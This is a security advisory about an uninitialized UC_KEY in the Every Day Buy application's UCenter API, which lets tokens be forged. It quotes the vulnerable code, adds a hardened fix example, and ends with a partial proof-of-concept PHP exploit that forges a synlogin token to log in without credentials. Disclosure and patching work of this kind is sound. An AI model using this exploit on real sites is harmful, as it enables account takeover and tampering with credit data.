Every Day Buy: security risk and patch for an uninitialized UC_KEY - vulnerability warning - Black Bar Safety Net

Published: 2012-04-17T00:00:00
ID: MYHACK58:62201233687
Type: myhack58
Reporter: Anonymous (佚名)
Modified: 2012-04-17T00:00:00

Description

Every Day Buy integrates the UCenter one-stop login API, but because UC_KEY is never initialized, an attacker can log in to any account and even manipulate credit information.

Detailed description:

$get = $post = array();
$code = @$_GET['code']; // fetch the token
parse_str(_authcode($code, 'DECODE', UC_KEY), $get); // when UC_KEY was never initialized it is empty
if(MAGIC_QUOTES_GPC) {
    $get = _stripslashes($get); // hmm?
}
$timestamp = time();
if(empty($get)) {
    exit('Invalid Request');
} elseif($timestamp - $get['time'] > 3600) { // a token whose timestamp is more than one hour old is rejected
    exit('Authracation has expiried');
}
$action = $get['action'];

... ...

if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcredit', 'getcreditsettings', 'updatecreditsettings'))) { // the set of operation interfaces; there are plenty of interesting ones in here

... ...

function synlogin($get, $post) { // the login interface
    $uid = (int) $get['uid']; // takes two parameters, uid and username
    $username = $get['username'];

    ... ...

    $query = $this->db->query("SELECT uid, password, secques FROM {$this->tablepre}system_members WHERE ucuid='$uid'"); // the value passed in is matched against ucuid, not the database uid, and ucuid is initially 0; the code is also sloppy in that username never enters the query, so only the first account can be logged in
    $UserFields = $this->db->fetch_array($query);
    if (!$UserFields) {
        ;
    }
    if($UserFields) {
        $auth = TTTuangouAuthcode("{$UserFields['password']}\t{$UserFields['secques']}\t{$UserFields['uid']}"); // after reading the user record, log the user straight in
        _setcookie('sid', '', -86400 * 365);
        _setcookie('auth', $auth, (365*86400));
        _setcookie('cookietime', '2592000', (365*86400));

    ... ...

With UC_KEY never initialized it is empty, which is the same as everyone knowing your UC_KEY: anyone can call these operations directly. It is as ridiculous as an application shipping with its key initialized to 123456; once the source code is published, is it not obvious at a glance?
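For contrast, here is an added example of a fail-closed version of the api/uc.php entry point. It is not the application's own code. It refuses to serve any UCenter call while UC_KEY is missing or empty (the actual fix for the problem above), bounds the token age in both directions instead of only rejecting old tokens, and resolves the synlogin user by uid and username through a prepared statement so that a uid of 0 no longer maps to whichever account comes first. The names config.inc.php, $pdo and $tablepre are assumptions for this example; _authcode() is assumed to have the signature of UCenter's authcode().

```php
<?php
// Added example, not code from the application described above.
// Assumptions (names chosen for this example): config.inc.php defines UC_KEY
// and provides $pdo (a PDO handle to the application database) and $tablepre
// (its table prefix); _authcode() has the signature of UCenter's authcode().

require_once __DIR__ . '/config.inc.php';

// 1. A missing or empty shared secret makes every token forgeable, so the API
//    must not run at all in that state.
function uc_key_is_configured() {
    return defined('UC_KEY') && is_string(UC_KEY) && UC_KEY !== '';
}

// 2. Accept a token only if its timestamp lies within [now - $maxAge, now + $skew].
//    The original check only rejects old tokens; a far-future timestamp would
//    otherwise stay valid indefinitely.
function token_time_is_valid($tokenTime, $now, $maxAge = 3600, $skew = 60) {
    if (!is_scalar($tokenTime) || !ctype_digit((string) $tokenTime)) {
        return false;
    }
    $t = (int) $tokenTime;
    return ($now - $t) <= $maxAge && ($t - $now) <= $skew;
}

// 3. Look the member up by both identifiers through a bound-parameter query,
//    so the username actually takes part in the lookup.
function find_member(PDO $pdo, $tablepre, $ucuid, $username) {
    if (!is_scalar($ucuid) || !is_scalar($username)) {
        return null;
    }
    $sql = "SELECT uid, password, secques FROM {$tablepre}system_members"
         . " WHERE ucuid = :ucuid AND username = :username LIMIT 1";
    $stmt = $pdo->prepare($sql);
    $stmt->execute(array(':ucuid' => (int) $ucuid, ':username' => (string) $username));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

if (!uc_key_is_configured()) {
    header('HTTP/1.1 503 Service Unavailable');
    exit('UC_KEY is not configured; UCenter API disabled');
}

$get = array();
$code = isset($_GET['code']) ? $_GET['code'] : '';
parse_str(_authcode($code, 'DECODE', UC_KEY), $get);

if (empty($get) || !isset($get['time'], $get['action'])) {
    exit('Invalid Request');
}
if (!token_time_is_valid($get['time'], time())) {
    exit('Token expired or not yet valid');
}

if ($get['action'] === 'synlogin') {
    $member = find_member($pdo, $tablepre,
                          isset($get['uid']) ? $get['uid'] : 0,
                          isset($get['username']) ? $get['username'] : '');
    if ($member === null) {
        exit('Invalid Request');
    }
    // ... issue the session cookies for $member as the application already does
}
```

The key guard is what closes the hole: a token is only as trustworthy as the secret it was sealed with, so the safe response to an empty secret is to serve nothing. The bound lookup and the two-sided time window are hardening on top of that, not substitutes for it.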

Proof of vulnerability:

Exp:

<?php
error_reporting(0);
$username = $argv[1];
$key = '';
$code = 'time=1356796800&username='.$username.'&uid=0&action=synlogin';
echo "$code\n";
$exp = urlencode(authcode($code, "ENCODE", $key));
print_r('/api/uc.php?code='.$exp);

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
